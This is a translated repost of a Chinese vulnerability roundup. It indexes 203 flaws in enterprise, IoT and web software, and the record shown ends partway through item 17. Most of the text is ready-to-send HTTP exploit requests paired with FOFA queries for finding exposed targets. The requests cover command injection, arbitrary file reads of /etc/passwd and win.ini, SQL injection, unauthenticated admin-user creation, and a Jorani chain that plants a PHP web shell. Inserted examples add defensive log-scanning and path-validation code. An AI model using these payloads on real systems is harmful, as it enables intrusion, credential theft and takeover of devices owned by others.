Public Vulnerability Roundup, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reposted from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and this article is meant to help defenders. Defensive teams can use its contents to check their own exposure.

Sources: the article collects 203 POCs for high-impact vulnerabilities published in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled for publication by the 网络安全新视界 team.

Patches: all of these vulnerabilities are already public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long have their body replaced by the placeholder PAYLOAD; search for the full POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the material will be removed.

Statement

To keep things simple and easy to browse there is no "reply to receive the full list" gate. This article is the complete list as it stands; when using it, press F12 and search for the keyword you need.

Bookmark this article if you need it, and consider following the public account (网络安全新视界).
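The exposure check mentioned above, as an added example that is not part of the original article: a small scanner that matches web access-log lines against request signatures copied from the POC section of this list (StarRocks, Casdoor, EasyCVR, NUUO, Sangfor NGAF, 808gps, jshERP, Dahua DSS/ICC). The Combined Log Format assumption, the sample log lines and the signature labels are constructed for this example.

```python
# Added example (not from the original article): match access-log lines
# against request signatures taken from the POC section of this article.
# Log format, sample lines and labels are assumptions made for the example.
import re
import urllib.parse
from collections import defaultdict

# Combined Log Format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# (label, pattern applied to the URL-decoded request target)
SIGNATURES = [
    ("StarRocks /mem_tracker unauthenticated access", re.compile(r"^/mem_tracker(\?|$)")),
    ("Casdoor /static traversal", re.compile(r"^/static/(\.\./)+")),
    ("EasyCVR userlist disclosure", re.compile(r"^/api/v1/userlist(\?|$)")),
    ("NUUO NVR command injection", re.compile(r"__debugging_center_utils___\.php\?log=")),
    ("Sangfor NGAF loadfile read", re.compile(r"/svpn_html/loadfile\.php\?file=")),
    ("808gps MobileAction_downLoad read", re.compile(r"/808gps/MobileAction_downLoad\.action\?path=")),
    ("jshERP getAllList bypass", re.compile(r"/jshERP-boot/user/.*getAllList")),
    ("Dahua DSS clearTempFile SQLi",
     re.compile(r"attachment_clearTempFile\.action\?.*(extractvalue|updatexml)", re.I)),
    ("Dahua ICC readPic file read", re.compile(r"/evo-apigw/evo-cirs/file/readPic\?fileUrl=file:", re.I)),
    ("Dahua ICC sysusers/random", re.compile(r"/evo-runs/v1\.0/auths/sysusers/random")),
]


def scan_log(lines):
    """Return one hit dict per (line, signature) match, in log order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        # Decode once so %27 / %20 in query strings are compared as text.
        target = urllib.parse.unquote(m.group("target"))
        for label, pattern in SIGNATURES:
            if pattern.search(target):
                hits.append({"ip": m.group("ip"), "status": int(m.group("status")),
                             "label": label, "target": target})
    return hits


def summarize_by_ip(hits):
    """ip -> list of labels, so one noisy source can be triaged at a glance."""
    by_ip = defaultdict(list)
    for h in hits:
        by_ip[h["ip"]].append(h["label"])
    return dict(by_ip)


# Constructed sample log; the request targets copy POCs 2, 14, 19 and 20 below.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Jun/2024:07:41:00 +0800] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1823 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Jun/2024:07:41:02 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '198.51.100.3 - - [05/Jun/2024:07:41:05 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [05/Jun/2024:07:42:10 +0800] "GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1" 200 1400 "-" "curl/8.0"',
    '203.0.113.7 - - [05/Jun/2024:07:43:30 +0800] "GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1" 500 233 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ip"], h["status"], h["label"], h["target"][:60])
```

A 200 on a file-read or disclosure signature means the request most likely succeeded, so the status code is kept with each hit; a 500 on the SQL-injection signature is consistent with an error-based probe. Add further patterns from the POC list below in the same shape.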
Table of Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAPPSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAPPSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin 网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast HD smart lecture-capture system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communication command-and-dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command-and-dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command-and-dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command-and-dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command-and-dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking payment system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 project management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet access management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyundrive WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC List

02
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

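The pattern behind POC 2, as an added example (not Casdoor's code and not from the original article): a static-file handler that joins whatever follows /static/ onto its directory can be walked out of with "../"; resolving the candidate path and checking that it is still under the root closes the hole, including the absolute-path and symlink variants. The directory layout is created in a temporary directory for the example and is an assumption.

```python
# Added example (not Casdoor's code): the traversal pattern behind POC 2 and
# the containment check that closes it. The static root used in demo() is a
# throwaway temp dir created for the example.
import os
import tempfile
from pathlib import Path

STATIC_PREFIX = "/static/"


def vulnerable_resolve(static_root: str, request_path: str) -> str:
    # Joins the remainder of the URL onto the root. normpath collapses the
    # "../" segments only after they have already escaped static_root.
    rel = request_path[len(STATIC_PREFIX):]
    return os.path.normpath(os.path.join(static_root, rel))


def hardened_resolve(static_root: str, request_path: str):
    """Return the on-disk path for a /static/ request, or None when the
    request resolves outside static_root (traversal, absolute path, or a
    symlink pointing out of the tree)."""
    if not request_path.startswith(STATIC_PREFIX):
        return None
    root = Path(static_root).resolve()
    rel = request_path[len(STATIC_PREFIX):]
    candidate = (root / rel).resolve()  # collapses ../ and follows symlinks
    if candidate != root and root not in candidate.parents:
        return None
    return str(candidate)


def demo():
    """Build a throwaway static dir and run both resolvers on a traversal
    request (same shape as POC 2), an absolute-path variant and a
    legitimate asset request."""
    root = tempfile.mkdtemp()
    (Path(root) / "js").mkdir()
    (Path(root) / "js" / "main.js").write_text("console.log('ok');\n")
    traversal = STATIC_PREFIX + "../" * 11 + "etc/passwd"
    return {
        "vulnerable": vulnerable_resolve(root, traversal),
        "hardened_traversal": hardened_resolve(root, traversal),
        "hardened_absolute": hardened_resolve(root, "/static//etc/passwd"),
        "hardened_legit": hardened_resolve(root, "/static/js/main.js"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:20s} {value}")
```

The check compares resolved paths rather than strings, so it is not fooled by an extra leading slash (which makes os.path.join discard the root entirely) or by a symlink inside the static tree.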
3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of the password you want to set.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the request below; the injected command rides in the wifiRebootrange field.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=cookie obtained from the step-one login
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement (the leading 1 is left unencoded):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

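What "double URL encoding" in POC 9 means for a filter, as an added example that is not from the original article or from Doccms: a WAF or log parser that percent-decodes once still sees escapes and no SQL keywords; decoding until the value stops changing exposes the injected statement. The payload is the one from POC 9; the SQL marker list is an assumption made for the example.

```python
# Added example (not from the article or Doccms): recover the SQL from the
# double-URL-encoded keyword parameter in POC 9 and show why a single
# decode pass misses it. SQLI_MARKERS is an illustrative list, not a WAF rule.
import re
import urllib.parse

# Copied from the POC 9 request line.
DOCCMS_KEYWORD = (
    "1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35"
    "%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31"
    "%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66"
    "%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37"
    "%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33"
    "%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39"
    "%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39"
    "%25%32%39%25%32%33"
)
EXPECTED_SQL = "1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"

SQLI_MARKERS = re.compile(
    r"(extractvalue|updatexml|\bunion\b|\bselect\b|sleep\(|waitfor\s+delay)", re.I
)


def decode_until_stable(value: str, max_rounds: int = 5):
    """Percent-decode repeatedly; return (decoded, rounds_needed).
    The round cap keeps a hostile input from spinning the loop."""
    rounds = 0
    while rounds < max_rounds:
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def percent_encode_all(s: str) -> str:
    """Encode every byte (lowercase hex), the way the POC payload was built."""
    return "".join("%%%02x" % b for b in s.encode("utf-8"))


def inspect_param(value: str):
    """Compare what a one-pass decoder and a full decoder would see."""
    decoded, rounds = decode_until_stable(value)
    return {
        "decoded": decoded,
        "rounds": rounds,
        "flagged_after_one_decode": bool(SQLI_MARKERS.search(urllib.parse.unquote(value))),
        "flagged_after_full_decode": bool(SQLI_MARKERS.search(decoded)),
    }


if __name__ == "__main__":
    print(inspect_param(DOCCMS_KEYWORD))
```

Two decode rounds are needed here; the same loop also normalises mixed or partially encoded variants before any keyword rule is applied.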
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value from the response is reused in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST a login attempt. The language parameter points at ../../application/logs, and the login field carries PHP that runs system() on the base64-decoded value of the K1SYJPMHLU4Z request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: request the day's log page to run the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command; it decodes to: echo ---------;id 2>&1;echo ---------;
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC makes SQL Server compute the MD5 of 1234; check the response for 81DC9BDC52D04DC20036DBD8313ED055 (the MD5 of 1234).
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
